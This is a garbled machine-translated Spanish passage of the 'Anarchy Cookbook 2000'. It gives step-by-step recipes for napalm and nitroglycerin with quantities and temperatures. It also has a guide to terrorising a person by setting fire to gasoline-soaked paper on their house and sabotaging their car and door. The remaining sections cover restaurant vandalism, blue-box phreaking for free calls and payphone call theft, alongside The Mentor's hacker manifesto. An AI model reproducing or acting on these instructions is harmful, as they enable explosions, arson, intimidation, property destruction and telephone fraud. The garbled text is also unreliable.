Ahora, a pesar de McDonalds es famosa por su publicidad y lo que todo el mundo piensa que el BigMac es lo mejor que puede venir desde el pan rebanado (bollos?), Cada pequeño restaurante es tan simple como aficionado y un negocio de nuevo cuño. No sólo son todos los empleados sin experiencia y no en lo que se supone deben hacer, sino que simplemente va a perder todo el control en caso de emergencia .... aquí vamos! En primer lugar, tener unos cuantos amigos (4 es bueno ... Voy a llegar a esto más adelante) y entrar en el restaurante McDonalds, hablando en voz alta y apestando a un olor extraño que automáticamente hace que la pareja de ancianos sentados junto a la puerta de la licencia. Si uno de esos matones cara llena de granos está limpiando el piso, y luego realizar un seguimiento de alguna mierda por todas partes (puede pretender caer y romperse la cabeza, pero que en realidad podría hacerlo). A continuación, antes de llegar a la comida, encontrar una mesa. Comienzan a gritar y liberar un poco de olor cuerpo extraño así que a nadie dejaría a su mesa y salir por la puerta. Siéntese dos amigos allí, e ir al mostrador con el otro. Encuentre un lugar

Page 78: 106652012 the Anarchy Cookbook 2000 Es

donde la línea es corta, o si la línea está siempre dicen "Yo sólo quiero comprar una coca-cola." y se movió hacia arriba. Ahora, se llega a hacer el ordenamiento ... je je je. Siempre hay alguien que debe querer una hamburguesa simple con absolutamente nada en él (esto toma más tiempo para hacer, y lleva a la pequeña hamburguesa de decisiones loco) .. Para un niño de 9 paquete de McNuggets de pollo ... no, un paquete de 20 ... no, tres paquetes de 6 ... espera ... volver a la mesa y pida lo que quiera. Su otro amigo espera por el contador y da un pase al empleado femenino. Para regresar a la cosa y para tres paquetes de 6 botellas de pollo, etc ... ahora ella dice: "¿Qué tipo de salsa que te gusta?". Por supuesto, decir que todos queremos la salsa de barbacoa uno de sus amigos quiere 2 (sólo si sólo hay dos contenedores de salsa de barbacoa izquierda). Luego hafta ir a la bodega y abrir otra caja. Por último, las bebidas ... alguien quiere coca, cerveza de raíz a alguien, y alguien Coca-Cola Light. Después de que estos se entregan, traer de vuelta y decir: "Yo no pedí una coca cola Light! Yo pedí un sprite!" Esto nos lleva locos, mejor aún, baje algo terrible que nadie quiere beber, por lo que hafta tirar la copa de distancia, ya que no se puede vender. Después de todo la comida (?) Se entrega a ti, nunca debe tener suficiente dinero para pagar. El secretario será tan enojado y confundido que ella te dejará salirse con la suya (otra influencia sobre ella es su amigo pidiéndole que "Si vamos a ir, voy a salir contigo." Y darle una falsa fone número). Ahora, de vuelta a su mesa. Pero en primer lugar, a alguien le gusta el ketchup y la mostaza. Y muchos (demasiados) de servilletas. Ah, y tenedores y cuchillos a alguien le gusta, así que siempre terminan rompiendo los que recogen Sal de la caja. Haz que tus amigos gritar, ôYay!! Tenemos hambre! "Tan fuerte como les sea posible. Eso tendrá que preocuparse todo el restaurante. Proceder a sentarse. Por lo tanto, usted está sentado en la sección de fumadores (por accidente) ¿eh? Bueno, mientras que uno de los ISN del tabaco que respiran 't buscando, poner un letrero desde el otro lado de la habitación diciendo: "No fume aquí" y moverá hafta ... entonces él entra en la verdadera zona de no fumadores, y se gritó. A continuación, cree que no se permite fumar en el restaurante, por lo que se come fuera (en la lluvia) después de la comida ha terminado (y un buen número de paquetes abiertos, salpicado de salsa de tomate están por encima de su mesa), tratan de salir. Pero oops! Alguien tiene que cumplir con su deber en la habitación de los hombres. A medida que va allí, saca una hamburguesa sin comer (¿te atreverías a comer una de sus hamburguesas?) Dentro de la taza del baño, enjuaga un rato, hasta que se agote todo el baño. Oops! Enviar un adolescente lleno de granos de cara para limpiarla. (Él no sabrá que lo marrón es una hamburguesa, y él se enferma. Wheee!) Al salir del restaurante, mirando hacia atrás en su mesa sin limpiar, alguien debe recordar que dejando a su chocolate, agitar allí! La que está casi lleno!! Él lo toma a continuación dice: "Esto sabe a mierda!", entonces se quita la tapa y la tira a la basura ... oops! Se perdió, y ahora la misma alma pobre que está limpiando el baño ahora HASTA limpieza de batido de chocolate. A continuación, dejar la articulación, la inversión de la "Sí, estamos abiertos" signo (como un recordatorio de su visita) Ahí lo tienes! Usted acaba de poner todo de McDonalds en el caos completo. Y puesto que no hay penalidad por tirar basura en un restaurante, la gente de espionaje en un restaurante público (o tiro-Upéry, en este caso) se baje impunes. ¿No es esto divertido?

75. "MentorLas últimas palabras de 's "de + + + La Mentor + + +

El siguiente archivo está siendo reproducido en el honor y la compasión por los phreaks muchos y los piratas informáticos que han sido rompieron recientemente por el Servicio Secreto.

La Conciencia de un HackerUno más ha sido capturado hoy, es en todos los periódicos. "Joven arrestado por delito informático", "Hacker arrestado luego de seguridad de un banco" ... Malditos muchachos. Son todos iguales. Pero, ¿tú, en tu sicología de tres partes y tecnocerebro de 1950, siquiera echar un vistazo detrás de los ojos de un hacker? ¿Te has preguntado alguna vez qué lo mueve, qué fuerzas lo han formado, cuáles lo pudieron haber moldeado? Soy un Hacker, entra a mi mundo ... El mío es un mundo que comienza en la escuela ... Soy más inteligente que la mayoría de los otros muchachos, esa basura que ellos nos enseñan me aburre ... Maldita sea bajo rendimiento. Son todos iguales. Estoy en la escuela secundaria o bachillerato. He escuchado a los profesores explicar por decimoquinta vez

Page 79: 106652012 the Anarchy Cookbook 2000 Es

como reducir una fracción. Yo lo entiendo. "No, Srta. Smith, no mostrar mi trabajo. Yo lo hice en mi cabeza ..." Maldito niño. Probablemente se lo copió. Son todos iguales. Hice un descubrimiento hoy. Me encontré con un ordenador. Espera un segundo, esto es genial. Hace lo que quiere. Si comete un error, es porque yo me equivoqué. No porque no me gusta o se siente amenazado por mí o piensa que soy un culo inteligente o no le gusta enseñar y no debería estar aquí ... Maldito niño. Todo lo que hace es jugar. Son todos iguales. Y entonces sucedió. Se abrió una puerta a un mundo. Corriendo a través de la línea telefónica como la heroína a través de las venas de un adicto, un pulso electrónico se envía, un refugio para las incompetencias del día a día es buscado ... una placa se encuentra. "Esto es ... aquí es donde yo pertenezco ..." Conozco a todos aquí ... incluso si nunca los he conocido, nunca hablé con ellos, nunca se puede escuchar de ellos otra vez ... Sé que todos ustedes ... Maldito niño. Ocupar la línea telefónica de nuevo. Son todos iguales ... Puedes apostar tu culo todos somos iguales ... hemos sido alimentados con cuchara la comida del bebé en la escuela, cuando estábamos hambrientos de carne ... Las migajas de carne que ustedes dejaron escapar estaban masticadas y sin sabor. Nosotros hemos sido dominados por sádicos, o ignorados por los apáticos. Los pocos que tenían algo que enseñarnos encontraron alumnos complacientes, pero esos pocos son como gotas de agua en el desierto.

Este es nuestro mundo ahora ... el mundo del electrón y el conmutador, la belleza del baudio. Hacemos uso de un servicio que ya existe sin pagar por lo que podría haber sido más barato si no fuese dirigido por glotones hambrientos de ganancias, y ustedes nos llaman criminales. Exploramos ... y ustedes nos llaman criminales. Buscamos ampliar nuestros conocimientos ... y ustedes nos llaman criminales. Nosotros existimos sin color, sin nacionalidad, sin prejuicios religiosos ... y ustedes nos llaman criminales. Ustedes construyeron bombas atómicas, hacéis la guerra, el asesinato que, engañar y mentir a nosotros y tratan de hacernos creer que es por nuestro propio bien, pero nosotros somos los criminales.

Sí, soy un criminal. Mi crimen es la curiosidad. Mi crimen es juzgar a la gente por lo que dicen y piensan, no lo que parecen. Mi crimen es ser más inteligente que ustedes, algo que nunca me perdonaréis. Yo soy un hacker, y este es mi manifiesto. Usted puede detener a este individuo, pero no puedes detenernos a todos ... después de todo, todos somos iguales.

+ + + La Mentor + + +

Que nunca los miembros de la comunidad Phreak olvidar sus palabras-JR

76. El mito del detector de 2600Hz por The Jolly Roger

Casi todo el mundo me habla en estos días acerca de ESS parece estar aterrados por el detector de 2600Hz. No sé que le ocurrió esa idea, pero simplemente no existe. Así que muchos de ustedes se quejan acerca de este dispositivo Phreak llamada captura por ninguna razón. Alguien con AT & T dijo que tenía que coger phreakers. Esto fue sólo para asustar a los boxeadores de color azul lo suficiente como para hacerlo desistir de boxeo llamadas gratuitas. No estoy diciendo que ESS tiene sus obsesiones, ya sea. Una cosa que puede detectar fácilmente ESS es la de que rebote el circuito del tronco envía de vuelta a la máquina del SEE cuando su tono de 2600Hz poco se restablece el tronco peaje. Después de un ESS detecta un contragolpe se convierte en un detector de lunes a viernes y los registros de los tonos MF de transmisión.

Derrotar el detector de reboteComo mencioné en mi nota anterior, rebote de detección puede ser una molestia grave para cualquier persona interesada en hacerse con el control de una línea troncal. La forma más fácil de by-pass de este circuito de detección no es en realidad sin pasar por ella en absoluto, es simplemente dejar que el rebote se detecta en otra línea. Esta línea es otra de su localidad MCI, Sprint, o de otra compañía de larga distancia (excepto AT & T). La única pega es que el servicio que usted utiliza no debe desconectar la línea cuando se pulsa el tono de 2600Hz. Esta es la forma de hacerlo: llamar a su extensión de local, poner en el código, y marcar un número en el código de área 601 y el intercambio 644. Un montón de bolsas de trabajo de otros en todo el país, estoy seguro, pero esta es la única que he encontrado hasta ahora. De todas formas, cuando empieza a sonar, simplemente pulse 2600Hz y oirás el saque de nuevo, (ka-

Page 80: 106652012 the Anarchy Cookbook 2000 Es

chirrido, o lo que sea). Entonces usted está listo para marcar a quien quieras (conferencias, ruta hacia el interior, y la tasa, en el exterior, etc) de la línea troncal del operador en tonos! Desde que sopla 2600Hz no te hace un phreaker hasta el peaje reinicia el equipo de la línea, la detección de retroceso es el método de AT & T elige (por ahora) esta información es el resultado de mis experimentos y de experiencia y ha sido verificado por local de AT & T, los empleados que tienen como conocidos. Sólo podría decir que esto es cierto para mi área, pero estaban seguros de que la misma idea se aplica en todo el país.

Ahora que ya sabe cómo acceder a una línea troncal o como dicen los operadores de un bucle, te diré las cosas que usted puede hacer con él. Aquí está una lista de AT & T de servicios accesibles a usted mediante el uso de una caja azul.

A / C 101 NÚMERO DE CONMUTACIÓNA / C 121 INTERIOR DEL OPERADORA / C 131 DE INFORMACIÓNA / C 141 RUTA & OP TASA.A / C 11501 MÓVIL OPERADORA / C 11521 MÓVIL OPERADOR

Conferencias de inicio:Este es uno de los atributos más útiles de azul boxeo. Ahora bien, los confs. son hasta las 24 horas del día y 7 días a la semana y las líneas de facturación se facturan siendo. Puesto que creo que lo anterior es cierto (sobre las líneas de facturación que se factura) te recomiendo que nunca le dejó su número aparezca en la conf. Si usted empezó, lo puso en un bucle y luego llamar al bucle. Basta una mierda!! Para iniciar la conf. Marque uno de estos tres números en mf mientras usted está en el tronco.

213 080 + XXXXXXXX = 1050,3050XXXX ESPECIAL = 1000,1100,1200,1500,2200,2500.

Estos números se encuentran en Los Angeles y es el más visto, no recomiendo usar estePlan Nacional de Acción.312 001 1050 O 3050914 042 1050 o TEC 1100,1200 ..

Creo que sólo 914 obras en este momento.

Una vez conectado con uno de estos que tanto se oye un nuevo orden, ocupado, o chirrido. Cuando usted oye el chirrido de entrar en la línea de facturación en el MF. Yo uso la conf. dial-up. Una línea de facturación ejemplo: kp312 001 1050 ª, a continuación, se escucharán dos institutos y una grabación que le pide el número de conferenciantes como a ti mismo. Introduzca un número de entre 20 y 30. Si alguna vez tienes más de 30 personas en una conferencia de todo lo que oye voces está revuelto. Después de que el que dice "el tamaño de su conferencia es xx" y luego golpear la almohadilla (#) signo. Añade tu lazo favorito y pulse 6 para transferir el control a la misma. Después de que se dice que el control se transferirá cuelgue y llame al otro lado del bucle, pulse el signo numeral (#) y siga las instrucciones. Un bono para conf. consiste en añadir un número de marcación internacional 1 011 + cc + número ehhh muy bien. Algunas notas adicionales. No añadir números a los que se quieren colgar, agregue estos a través de MCI o Sprint. No se puede soplar a nadie fuera de 2600Hz menos que estén en un viejo sistema x-bar o más. Muchos operadores de DA permanecerá encendida después de que abusar de ellos, puede que tenga que iniciar otro o por lo menos no dicen los números. Nunca agregar el tono lateral de un bucle en una conf. Nunca añadir más de un nodo de MCI en su conf.

Recorrido y tasa:Nota ruta y tarifa RQS y realizar el mismo servicio. R & R, simplemente te dice la ruta y la información de velocidad que es muy valioso, ej. Tales como la ruta hacia el interior de un intercambio en un código de área. Una ruta hacia el interior le permitirá llamarla y ella puede hacer una interrupción de emergencia para usted. Ella

Page 81: 106652012 the Anarchy Cookbook 2000 Es

le puede decir cómo conseguir los operadores internacionales, etc. Éstos son los términos que están obligados a utilizar:

Internacional,-Operador de ruta para [nombre del país, la ciudad]. -Que da hacia el interior op.-Directorio de la ruta de [nombre del país, la ciudad]. Que-da culo directorio.-Ciudad de las rutas de [nombre del país, la ciudad]. Que-da país y la ciudad.Operador de las rutas de [a / c] + [cambio] -Que da hacia el interior op. RutaEx. [A / c] + o [a / c] 0 + xx cuando ella dice que ella quiere decir, más, más 121.Los números de las rutas de [el estado, la ciudad] Que-da a / c.Coloque el nombre de [a / c] + [cambio] Que-da de la ciudad / estado para que los A / C yExchange.

Llamadas internacionales:Para llamadas internacionales a través de cable, simplemente tener acceso a un tronco y marcar el tono de espera kp011xxxst remitente, kpxxxcc numberst-xxx - un código de país de 3 dígitos, no puede ser de 3 dígitos que sólo hay que poner 1 o 2 0 en frente de ella. CC - Es el código de la ciudad para ir por satélite:

Marque x kp18xst - Los números de 2-8 espere el tono de emisor a continuación Kpxxxccnumberst

77. Blue Box por The Jolly Roger

Para citar a Karl Marx, el azul del boxeo siempre ha sido la forma más noble de phreaking. A diferencia de las cosas tales como el uso de un código de MCI para hacer una llamada fone libre, que es simplemente estúpida pseudo-phreaking, azul boxeo es la interacción real con la red de peaje del sistema de Bell. Asimismo, es aconsejable ser más cautos cuando el azul del boxeo, pero el Phreak cuidado de no será atrapado, sin importar qué tipo de sistema de conmutación está bajo. En esta parte, voy a explicar cómo y por qué las obras de boxeo de color azul, así como el lugar. En las partes posteriores, voy a dar más información práctica para el azul del boxeo y la información de enrutamiento. Para empezar, el azul del boxeo es simplemente la comunicación con los troncos. Los troncos no deben confundirse con las líneas de abonado (o "loops" de los clientes), que son líneas estándar Telefone. Los troncos son las líneas que conectan las oficinas centrales. Ahora, cuando los troncos no están en uso (es decir, en reposo o "colgado" del Estado) que han 2600Hz que se les aplica. Si son de dos vías troncales, hay 2600Hz en ambas direcciones. Cuando un tronco está en uso (ocupado o "descolgado" del Estado), el 2600Hz se retira de la parte que está descolgado. El 2600Hz tanto, es conocida como una señal de supervisión, ya que indica el estado de un tronco, en el gancho (tono) o descolgado (sin tono). Tenga en cuenta también que denota 2600Hz SF (frecuencia única) de señalización y es "en banda". Esto es muy importante. "En banda" significa que está dentro de la banda de frecuencias que pueden ser transmitidas a través de líneas Telefone normales. Otras señales de SF, como 3700Hz se utilizan también. Sin embargo, no se puede llevar a través de la red telefono normal (que están "fuera de banda" y por lo tanto no puede ser aprovechado como 2600Hz es. Volver a los troncos. Vamos a tomar una llamada telefónica hipotético. Recoger su fono y marque una +806-258-1234 (su buen amigo en Amarillo,Texas). Para mayor facilidad, vamos a suponer que usted está en el número 5 conmutación de barras cruzadas, y no en la zona 806. Su oficina central (CO) que reconocen que 806 es un extranjero NPA, por lo que encaminaría la llamada al centro de peaje que te sirve. [En aras de la exactitud de aquí, y para los lectores más experimentados, tenga en cuenta que el CO en cuestión es una clase 5 con Lama que utiliza fuera de la banda de San Francisco de señalización de control]. Dependiendo de donde usted se encuentra en el país, la llamada podría salir de su centro de peaje (de más troncos) a otro centro de peaje, o en la oficina de mayor "rango". Luego se dirige a la oficina central de 806-258 con el tiempo y la llamada se complete.

IlustraciónUn CO1 --- ------- ------ TC1 TC2 de CO2 ---- ---- B

Page 82: 106652012 the Anarchy Cookbook 2000 Es

A. ... ustedCO1 .. su oficina centralTC1 .. el número de la oficina.TC2 .. número de oficinas en Amarillo.De CO2 .. 806-258 de la oficina central.B. ... su amigo (806-258-1234)

En esta situación sería realista decir que el CO2 utiliza SF en la banda (2600Hz) de señalización, mientras que los demás usan fuera de la banda de señalización (3700Hz). Si usted no entiende esto, no te preocupes. Señalo esto a cabo solamente por el bien de la precisión. El punto es que mientras estás conectado a 806-258-1234, todos los troncos de su oficina central (CO1) a la oficina central de 806-258 (CO2) * no * tiene 2600Hz en ellos, lo que indica a la Campana equipo que una llamada está en curso y los troncos de los están en uso. Ahora digamos que usted está cansado de hablar con tu amigo en Amarillo, Por lo que enviar un 2600Hz en la línea. Este tono se desplaza por la línea a la oficina central de su amigo (CO2) en el que se detecta. Sin embargo, que el CO piensa que el 2600Hz es originaria de los equipos de Campana, lo que indica que lo que has colgado, y por lo tanto los troncos son una vez más inactivo (con la presencia de 2600Hz en ellos). Pero, en realidad, no han colgado, le han engañado al equipo en el CO de su amigo en el pensamiento de que usted tiene. Por lo tanto, se desconecta él y el equipo se restablece el de prepararse para la siguiente llamada. Todo esto sucede muy rápidamente (300-800ms para el equipo paso a paso y 150-400ms para otros equipos). Cuando se detiene el envío de 2600Hz (después de aproximadamente un segundo), el equipo cree que está entrando una llamada hacia la -> en el gancho, no hay tono -> descolgado. Ahora que ha dejado de enviar 2600Hz, suceden varias cosas:

1. Un tronco se aprovecha.2. Un "guiño" se envía a la llamada final a partir del final LLAMADO lo que indica que

el extremo llamado (tronco) no está listo para recibir dígitos todavía.3. Un registro se encuentra y se une al extremo del tronco LLAMADA dentro de

aproximadamente dos segundos (max).4. Una señal de inicio de línea se envía al extremo de llamadas desde el extremo

llamado indicando que el extremo llamado está listo para recibir dígitos. Ahora, todo esto es más o menos transparente para el boxeador de color azul. Todo lo que realmente escucha cuando estas cuatro cosas suceden es un <kerchunk> <beep>. Por lo tanto, la incautación de un tronco sería algo como esto:

1. Enviar un 2600Hz2. Terminar 2600Hz después de 1-2 segundos.3. [Pitido] [kerchunk]

Una vez que esto sucede, usted está conectado a un tándem que está dispuesto a obedecer su cada comando. El siguiente paso es enviar la información de señalización con el fin de realizar su llamada. Para ello se debe simular la señalización utilizada por los operadores y al número de marcación automática de equipos para su uso en los troncos. Hay principalmente dos sistemas, DP y MF. Sin embargo, DP salió con los dinosaurios, por lo que sólo hablaremos de lunes a viernes de señalización. MF (multifrecuencia) de señalización es la señalización utilizada por la mayoría de la red inter-e intra-lata. También se utiliza para la marcación internacional conocido como el CCITT No existe un sistema y medio. Señales MF constan de 7 frecuencias, comenzando con 700Hz y separados por 200Hz. Un conjunto diferente de dos de las 7 frecuencias representan los dígitos 0 a 9, más un adicional de 5 teclas especiales. Las frecuencias y usos son las siguientes:

Las frecuencias (Hz) Nacional Internacional700 +900 1 1700 +1100 2 2900 +1100 3 3700 +1300 4 4900 +1300 5 51100 +1300 6 6700 +1500 7 7

Page 83: 106652012 the Anarchy Cookbook 2000 Es

900 +1500 8 81100 +1500 9 91300 +1500 0 0700 +1700 ST3p Código 1900 +1700 Stp Código 11100 +1700 KP KP11300 +1700 ST2p KP21500 +1700 ST ST

El momento en que todas las señales MF es un 60ms nominal, excepto por PK, que debe tener una duración de 100 ms. También debe haber un período de 60 ms en silencio entre los dígitos. Esto es muy flexible, sin embargo, y más Campana equipo aceptará tiempos atroces. Además de la norma utiliza antes mencionados, MF pulso también se ha expandido los usos conocidos como "ampliación de la señalización dentro de banda", que incluyen cosas tales como la moneda de recoger, el rendimiento de moneda, de llamada, el operador adjunto y operador adjunto, y puesto en libertad el operador. KP2, código 11, y el código 12 y los ST_ps (inicio "prepara" todos tienen usos especiales que se mencionan brevemente aquí. Para realizar una llamada usando una caja azul, una vez la incautación de un tronco que se ha logrado mediante el envío de 2600Hz y una pausa de la <kerchunk> <beep>, primero hay que enviar un Protocolo de Kioto. Este prepara el registro de los dígitos que siguen. Para una llamada interna estándar, el Protocolo de Kioto sería seguido por cualquiera de 7 dígitos (si la llamada se encontraban en el mismo PAN, el tronco se apoderó) o 10 dígitos (si la llamada no se encontraban en el mismo Plan Nacional de Acción como el tronco incautadas). [Exactamente igual que la marcación de llamadas fone normal]. Después de tanto el Protocolo de Kioto y los dígitos 7 y 10, un inicio se envía para indicar que no se más dígitos de seguir el ejemplo de una llamada completa.:

1. Marque 1-806-258-12342. Espere a que una indicación de llamada en curso (como el anillo, ocupado grabando,

etc)3. Enviar 2600Hz durante aproximadamente 1 segundo.4. Espere alrededor de ll curso de identificación (como el anillo, ocupado grabando,

etc)5. Enviar PK 305 994 9966 + ST

La llamada se conectará si todo se hizo correctamente. Tenga en cuenta que si una llamada a un número 806 se estaban colocando en la misma situación, el código es que se omite y sólo KP + siete dígitos + ST podría ser enviado. El código 11 y código 12 se utiliza en llamadas internacionales a solicitar determinados tipos de operadores. KP2 se utiliza en llamadas internacionales a encaminar una llamada que no sea por medio de la ruta normal, ya sea por razones económicas o equipo. STp, ST2p y ST3p (principal, dos principales y tres prime) se utilizan en TSPS de señalización para indicar el tipo de llamada de llamada (por ejemplo, monedas de marcación directa.

78. Napalm II por The Jolly Roger

[Ver archivo # 021 del libro de cocina de una manera fácil de hacerlo!]

Acerca de la mejor bomba de fuego es napalm. Tiene una consistencia espesa, como la mermelada y lo mejor es para su uso en vehículos o edificios. Napalm es simplemente una parte de gasolina y un jabón de parte. El jabón es o copos de jabón o una barra de jabón rallado. Los detergentes no lo hará. La gasolina debe ser calentado para que el jabón para fundir. La forma habitual es con una caldera doble donde la parte superior tiene al menos una capacidad de dos cuartos. El agua en la parte inferior se lleva a ebullición y la caldera doble se toma de la estufa y llevado al lugar donde no hay llama. Entonces una parte, en volumen, de la gasolina se pone en la parte superior y se dejó calentar tanto como voluntad y el jabón se añade el desorden y se agita hasta que espese. Una mejor forma de calor es la gasolina para llenar una bañera con agua tan caliente como usted puede conseguirlo. Se llevará a cabo su calor por más tiempo y permitir un recipiente mucho más grande que la voluntad de la caldera doble.

Page 84: 106652012 the Anarchy Cookbook 2000 Es

79. La nitroglicerina Receta de The Jolly Roger

Al igual que todos los químicos que debe informar a todos a tomar el mayor cuidado y precaución cuando usted está haciendo esto. Incluso si usted ha hecho esto antes. Este primer artículo le dará información sobre cómo hacer la nitroglicerina, el ingrediente básico en una gran cantidad de explosivos, como dinamita rectas y dinamita gelatina.

Hacer que la nitroglicerina:1. Llenar un vaso de precipitados de 75-mililitros al 13 ml. Nivel con ácido nítrico

fumante rojo, de 98% de concentración pura.2. Colocar el vaso en un baño de hielo y se deja enfriar por debajo de la temperatura

ambiente.3. Después de que se haya enfriado, se suman a tres veces la cantidad de ácido fumante

sulferic (99% de H2SO4). En otras palabras, añadir a la ahora fría ácido nítrico fumante 39 ml. De humos de ácido sulferic. Al mezclar los ácidos, siempre lo hacen despacio y con cuidado para evitar las salpicaduras.

4. Cuando los dos se mezclan, bajar su temperatura. Mediante la adición de más de hielo en el baño, alrededor de 10-15 ° C. (Utilice un termómetro de mercurio que funciona)

5. Cuando la solución de ácido se ha enfriado a la temperatura deseada, que está listo para la glicerina. La glicerina se debe añadir en pequeñas cantidades utilizando un gotero. (Lea este paso alrededor de 10 veces!) Glicerina se añade lentamente y con cuidado (me refiero cuidado!) Hasta que la superficie entera del ácido se cubrió con ella.

6. Este es un punto peligroso ya que la nitración se llevará a cabo tan pronto como la glicerina se añade. La nitración se produce calor, por lo que la solución debe mantenerse por debajo de 30 ° C! Si la solución debe ir por encima de 30 ° C, inmediatamente volcar la solución en el baño de hielo! Esto asegurará que no se apaga en tu cara!

7. Durante los primeros diez minutos de nitración, la mezcla debe ser agita suavemente. En una reacción normal de la nitroglicerina se formará como una capa en la parte superior de la solución de ácido, mientras que el ácido sulferic absorberá el exceso de agua.

8. Después de la nitración ha tenido lugar, y la nitroglicerina se ha formado en la parte superior de la solución, el vaso de precipitados completa debe ser lenta y cuidadosamente transferido a otro recipiente con agua. Cuando esto se hace la nitroglicerina se depositan en el fondo por lo que los otros ácidos pueden ser drenada.

9. Después de eliminar el ácido lo más posible sin molestar a la nitroglicerina, retire la nitroglicerina con un gotero y colóquelo en un bicarbonato de soda (bicarbonato de sodio en caso de que no lo sabía) solución. El sodio es un álcali y se neutralizan gran parte del ácido restante. Este proceso debe repetirse tanto como sea necesario utilizar papel de tornasol azul para comprobar la presencia de ácido. El ácido restante sólo hace que la nitroglicerina más inestable de lo que ya es.

10. ¡Por fin! El paso final es eliminar la nitroglicerina desde el bicarbonato. Su se hace con cuentagotas y los ojos, lentamente y con cuidado. La prueba habitual para ver si ha tenido éxito nitración es colocar una gota de la nitroglicerina en el metal y encenderlo. Si es cierto que la nitroglicerina se quema con una llama azul claro.

Atención ** **Nitro es muy sensible a la descomposición, caída de calefacción, o desagradable, y puede explotar si se dejará reposar y enfriar.

80. Operación: Fuckup por The Jolly Roger

Esta es una guía para los anarquistas, y puede ser divertido para los no creyentes y los 12 y 13 años de edad runts, y puede ser un léxico de los conocimientos mortal para los verdaderos anarquistas ... Daño grave se destina a ser tratado aquí. No intente esto a menos que quiera hacer un montón de anarquía en serio.

Page 85: 106652012 the Anarchy Cookbook 2000 Es

[Simulación]Asshole - 'Oye, pedazo de mierda de punk adolescente, cállate la boca, o te voy a tumbar!'Anarquista - "¡muy bien No se puede decir que no te lo advertí. Usted no sabe mi poder rue ... " (Taaaan casualmente)Asshole - "Bueno, eh, ¿qué quieres decir?Anarquista - 'grin> <demoniac "Como puede ver, el anarquista sabe algo que este idiota no ...

[Operación Fuckup]Obtener un barril o dos ruedas. Rellenar con la gasolina. Consigue 16 rollos de papel higiénico, desenrollar y de presión en la gasolina. Jirones de la gasolina. Consigue guantes de amianto. Enciende una antorcha (de ser punk), toma pegote de papel higiénico saturada (se puede encender el pegote o no). Tira ya sea en llamas o goteo glob en:

• Cualquier ventana (la imagen es el mejor)• Puertas de entrada• Revestimiento de grano grueso• Lo mejor de todas las paredes de ladrillo,

En primer lugar, esta perra es casi imposible salir de una vez seca, y es un terror a la gente en el interior cuando está encendido! Después de esto ... durante la noche, conseguir una camioneta, unos pocos barriles de ruedas, y una docena de amigos con palas. La recogida se puede utilizar sólo para el transporte de personas y equipos, o hacer aquello, y acarreando toda la suciedad. Cuando se pone todo 12:00 (Después de que el perdedor le da beddie - bye), cavar un agujero gigantesco en el frente de su casa hasta cerca de 03:00. Puede asignar tres o cuatro de sus amigos a la cesta de la tierra diez kilómetros de distancia en la camioneta-cama, o enterrar a su puerta en el 15 'de la tierra! Después de que se hace, conseguir tres o cuatro cubos de alquitrán, y el abrigo de sus ventanas. Usted puede hacer una vuelta de tuerca al encender el alquitrán cuando se está todo hecho y listo para correr! Esto es, si el perdedor tiene una casa. Si vive dentro de un edificio de apartamentos, debe dirigir el ataque más hacia su coche, y puerta de entrada. Por lo general comienzan cuando se pone a trabajar ... me entero de lo que su coche barato parece, y memorizarlo para el maltrato en el futuro ... Siempre es divertido pintar su puerta de entrada (Apto.) rosa con morado polka- puntos, y fuera de neón de color en rayas diagonales. También puede golpear unos pocos cientos o cuatro por loInch Nails en la puerta de su frente (esto se parece a alguien de verdad no te gusta desde el interior). Otro grande es para llenar su ojo de la cerradura de acero líquido de modo que después de que el hijo de puta se cierra la puerta - la única manera de volver a es para romperla. Si se lo puede perder, lo dejan un hacha - es decir, implantado en tres pulgadas, ya través de la puerta! Ahora, este siguiente es difícil, pero uno de los mejores! Consiga un pedazo de revestimiento de madera que cubren más de la puerta de entrada por completo. Clave dos de cuatro en cuatro en los bordes del revestimiento (todos, excepto la parte inferior) para que tenga una barcaza - como artilugio. Hacer un agujero en la parte superior que será lo suficientemente grande como para una diapositiva de cemento. Mezclar unos seis o siete grandes bolsas de cemento de secado rápido. Utilice la diapositiva cemento para llenar la antecámara creado por la "barcaza 'que es alrededor de su puerta. Utilice más de dos en cuatro patas que se preparen a su pequeño de cemento lleno de barcazas, y dejar que la pequeña joya seco. Cuando lo está, retire la "barca" de modo que sólo queda un monolito de piedra que cubre la puerta. Use el cemento restante para hacer una base en torno a este por lo que no puede ser empujado. Cuando hice esto, llamó a los bomberos, y ellos pensaron que hablaba de madera, así que trajeron los ejes. Me miró con una docena o los inquilinos para que otros, y se echó a reír el culo maldita! Esto es sólo la puerta! Después de aparca el coche por la noche, la diversión realmente comienza ... me pongo a cabo por la apertura del coche por interferencia de una muy delgada, pero loack - dentro y por fuera! A continuación, proceder a poner zumo de naranja, el jarabe en los asientos, por lo que cuando llega a través de toda la otra mierda que lo haga, tendrá más pegajoso de laescaños en el mundo. A continuación, puede conseguir unos cuantos periódicos del domingo, y el crack una de las ventanas cerca de cuatro pulgadas. Ligeramente arrugar

Page 86: 106652012 the Anarchy Cookbook 2000 Es

los papeles, y siguen llenando por completo el interior de su coche con los periódicos. Una copia de The Sunday Times de Nueva York muy bien va a llenar un Volkswagen! Lo que también es muy divertido es poner su coche en bloques de concreto, recortar sus neumáticos en la parte superior, y rellenarlos con cemento! Deje los bloques de cemento allí, así que, después de que él llama el coche fuera de ellas, que obtendrá alrededor de 3 millas por galón con esos neumáticos, y hacer de 0 a 60 en unos dos minutos! Es aún más divertido cuando no sabe por qué diablos por qué! Otra es la de abrir la capilla, y luego ejecutar un par de cables de las bujías en el cuerpo de metal. El seguro es un coche caliente cuando está funcionando! Ahora, me gusta echar dos libras de azúcar por su tanque de gasolina. Si esto no sopla todos los junta en su motor que va a hacer algo que se llama "caramelizar su motor". Esto es cuando el calor extremo convierte el azúcar para el caramelo, y que, literalmente, debe tener por completo el motor de fuera y aparte, y limpiar cada parte individual! Bueno, si este pendejo no recibe el mensaje, es mejor comenzar a tomar en serio. Si esta guía se utiliza correctamente y como estaba previsto (no, no como leña para el fuego), este pendejo se moverá bien lejos, buscar ayuda psicológica profesional, el suicidio, o todo lo anterior!

81. Robo de llamadas desde teléfonos públicos por The Jolly Roger

Ahora para hacer llamadas locales gratuitas, usted necesita un clavo. Lo recomiendo encarecidamente "6D EG ACABADO C / H, 2 pulgadas" uñas. Se trata de alrededor de 3/32 de pulgada de diámetro y 2 pulgadas de largo (por supuesto). También se necesita un clip de papel de tamaño grande. Por grande que quiero decir que están a punto de 2 pulgadas de largo (plegado). A continuación, despliegue el clip de papel. Despliegue que mediante la adopción de cada pieza y moverla a 90 °. Una vez hecho esto debe verse algo como esto:

/ ---------- \ :: :: :: :: \ -----

